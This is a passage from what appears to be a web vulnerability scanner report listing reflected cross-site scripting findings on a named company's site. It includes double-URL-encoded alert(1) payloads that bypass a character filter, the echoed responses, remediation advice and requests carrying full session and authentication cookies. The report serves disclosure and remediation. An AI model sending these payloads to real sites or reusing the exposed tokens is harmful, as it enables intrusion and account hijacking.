The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc/medialib/countriesd7986%2522%253balert%25281%2529%252f%252f31940e1e566/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countriesd7986";alert(1)//31940e1e566/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.269. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 845dd%2522%253balert%25281%2529%252f%252f1283c962a59 was submitted in the REST URL parameter 4. This input was echoed as 845dd";alert(1)//1283c962a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc/medialib/countries/united-states845dd%2522%253balert%25281%2529%252f%252f1283c962a59/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:22 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states845dd";alert(1)//1283c962a59/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.270. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33225%2522%253balert%25281%2529%252f%252f86066d7a53a was submitted in the REST URL parameter 5. This input was echoed as 33225";alert(1)//86066d7a53a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc/medialib/countries/united-states/press-releases33225%2522%253balert%25281%2529%252f%252f86066d7a53a/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases33225";alert(1)//86066d7a53a/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.271. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3c67%2522%253balert%25281%2529%252f%252f21c09e05426 was submitted in the REST URL parameter 6. This input was echoed as e3c67";alert(1)//21c09e05426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc/medialib/countries/united-states/press-releases/safc-corporate-logoe3c67%2522%253balert%25281%2529%252f%252f21c09e05426 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:38 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/safc-corporate-logoe3c67";alert(1)//21c09e05426","E404") ;
   </script>
...[SNIP]...

1.272. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b0%2522%253balert%25281%2529%252f%252f4074737e8c2 was submitted in the REST URL parameter 1. This input was echoed as 971b0";alert(1)//4074737e8c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc971b0%2522%253balert%25281%2529%252f%252f4074737e8c2/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
